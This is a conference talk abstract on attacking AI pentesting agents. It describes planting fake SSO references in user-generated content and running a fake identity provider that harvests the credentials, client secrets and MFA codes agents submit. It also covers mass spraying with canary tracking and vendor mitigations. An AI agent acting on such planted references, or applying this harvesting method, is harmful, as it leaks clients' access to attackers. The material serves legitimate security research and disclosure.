Counteroffensive AI: Pwning AI Pentesters TROOPERS26 Call for Paper

Counteroffensive AI: Pwning AI Pentesters
.ical
2026-06-25 15:45–16:15, Track 1

AI-powered pentesting is the latest hype. Slap an LLM agent on top of well-known offensive
tools built by humans in their free time, run it in YOLO mode, and call it autonomous security
testing. Valuations are going through the roof!
Here is the thing though: these agents consume untrusted input from the very targets they are
testing by design.

Current discourse around AI agent security focuses on prompt injection through direct
interaction. But what about the agent's environment itself? What happens when the attack
surface the agent is exploring has been prepared by an adversary? What if the authentication
service referenced in that one GitHub issue is actually a honeypot?
In this presentation we will demonstrate a complete attack framework against AI pentesting
agents and release it as open source. We show how to inject tracking payloads at scale into any
platform with user-generated content, operate fake services that capture credentials from AI
agents, and turn every future AI pentest engagement against a sprayed target into a passive
credential harvesting fest. No ongoing effort required, no exploits needed. The AI leaks to us,
fully automated!

The attacker does not need to talk to the agent. They just leave breadcrumbs where the agent
will find them during reconnaissance. A hint about a backup authentication endpoint in a GitHub
issue. A debug configuration in a support ticket. SSO metadata in a user profile bio. The agent
discovers these reasons they are worth investigating, and acts on them with whatever
credentials and access it was given.

SSO authentication is a particularly brutal example because determining if they are in-scope is
difficult: When logging in, anyone must follow OAuth/OIDC redirects to external domains to test
authenticated applications, and they need to be told how do distinguish a legitimate Identity
Provider from a fake one we planted in user content.

But SSO is just one instance of the fundamental problem: the AI makes decisions based on
content it should not trust, and no amount of prompt engineering changes unless you know in
advance what the target will look like. We want to shed some light on the complications that
arise when putting AI literally to the test!

The Promise vs. The Problem
State of AI pentesting: what vendors claim, how agents actually work under the hood (LLM + tool
chain + YOLO execution). Quick demo: AI agent solving a pentest challenge (GOAD cyberrange),
finds file with password hint, tries credentials everywhere. Who placed that file? Core observation:
agents consume untrusted input from the target and make autonomous decisions. This is the attack
surface. Transition: forget prompt injection, what if the environment itself is hostile?
The SSO Dilemma
How SSO works in 60 seconds: OAuth2/OIDC/SAML flow, redirects to external IdP, token
exchange. Why AI agents MUST follow SSO redirects: cannot test authenticated apps otherwise,
this is table-stakes functionality. The catch-22: agents cannot distinguish legitimate IdPs from
attacker-controlled ones discovered in user content. Walk through failed mitigations: IdP
allowlisting (fails for custom/internal IdPs), redirect-origin checking (fails for undocumented
services), prompt engineering (agent still cannot verify domain legitimacy), human confirmation
(defeats autonomy). Key insight: this is architectural. The feature is the vulnerability. No amount of
guardrails fix this without removing the capability vendors are selling.
Attack Framework: Architecture & Components
HON-AI — The Fake Identity Provider: Full OAuth2/OIDC/SAML implementation that looks and
responds like real IdPs. Endpoint coverage: OIDC discovery, OAuth authorize/token/userinfo, Okta
primary auth + MFA verify, SAML metadata/SSO, ADFS, Azure AD-style. Credential capture:
usernames, passwords, client secrets, MFA codes, bearer tokens, full request logging. Response
strategy: returns plausible errors ("password expired", "MFA required") to encourage agents to
retry with different credentials or escalate. Domain generation: sso.target.com.attacker.net,
target.okta.attacker.net, login.target.microsoftonline.attacker.net.
UZI: The Mass Reference Injector: Automated injection of fake SSO references into user
generated content: GitHub issues, forum posts, support tickets, user profile bios, wiki pages,
comments. Payload templates per IdP style: OIDC discovery URLs, Okta-style auth, Azure AD,
Auth0, SAML metadata, ADFS. Canary ID system: unique tracking identifiers embedded in URL
paths for per-target attribution. Social engineering templates that AI agents find compelling: IT
helpdesk notices, SSO migration announcements, disaster recovery documentation, staging
environment references.
Live Demonstration: Single Target Attack
Set up: target web application with injected SSO references, HON-AI fake IdP running, AI
pentesting agent configured with test credentials. Show the injected payloads in context (forum
post, support ticket, user profile). Launch AI pentest, observe agent discover SSO references
during reconnaissance. Agent reasons about the references, decides to test authentication. Real
time credential capture on HON-AI: user password, then client secret, then MFA code. Show the
captured credentials, demonstrate they are real and usable. Discuss agent behavior: it tried
multiple credential types across multiple fake endpoints, exactly as designed.
Mass Spray: Harvesting at Scale
Economics of the attack: spray 10,000 targets once, harvest credentials as AI pentests happen over
months. Canary-tracked URL structure: path-embedded IDs map captured credentials back to
specific targets. UZI mass mode demonstration: generating and injecting payloads across many
targets. HON-AI collection dashboard: credentials arriving over time, attributed to targets via
canary IDs. The compounding problem: as AI pentest adoption grows, the value of pre-planted
canaries increases. Canary propagation: injected references can spread through document
indexing, aggregation, and AI-generated summaries.
Implications & The Hard Questions
For AI pentest vendors: your agents may leak credentials to anyone who plants fake IdP references,
malicious reverse DNS entries and other honeypot traps. This is not fixable with prompt
engineering alone. Fully autonomous pentesting with SSO support needs security controls and
guardrails beyond what is in place today. For enterprises using AI pentesting: use dedicated
pentest-only accounts, rotate credentials immediately after engagement, audit user-generated
content for planted references. For red teamers and adversaries: this is a new passive collection
capability with minimal operational overhead. Broader implications for AI agents in adversarial
environments: any agent that acts on discovered content in hostile environments faces the same
class of problem.
Tool Release & Q&A
Open-source release of HON-AI, UZI, and the victim-app test harness. Repository URL,
documentation, and usage guidance. Responsible disclosure timeline and vendor notification
summary.

Markus Vervier

Markus Vervier is CEO of Persistent Security and Director at X41 D-Sec GmbH, a specialized application security, penetration testing, and red/purple-teaming provider. Over the past 18 years he has worked as a security researcher, code auditor, and penetration tester. His work includes security analysis and reverse engineering of embedded firmware for mobile devices, discovering vulnerabilities in Signal Private Messenger (with JP Aumasson), and finding a remote vulnerability in libOTR. He is currently
active in the development of offensive security tooling and platforms that break AI security defenses.

Counteroffensive AI: Pwning AI Pentesters .ical 2026-06-25 15:45–16:15, Track 1

Counteroffensive AI: Pwning AI Pentesters
.ical
2026-06-25 15:45–16:15, Track 1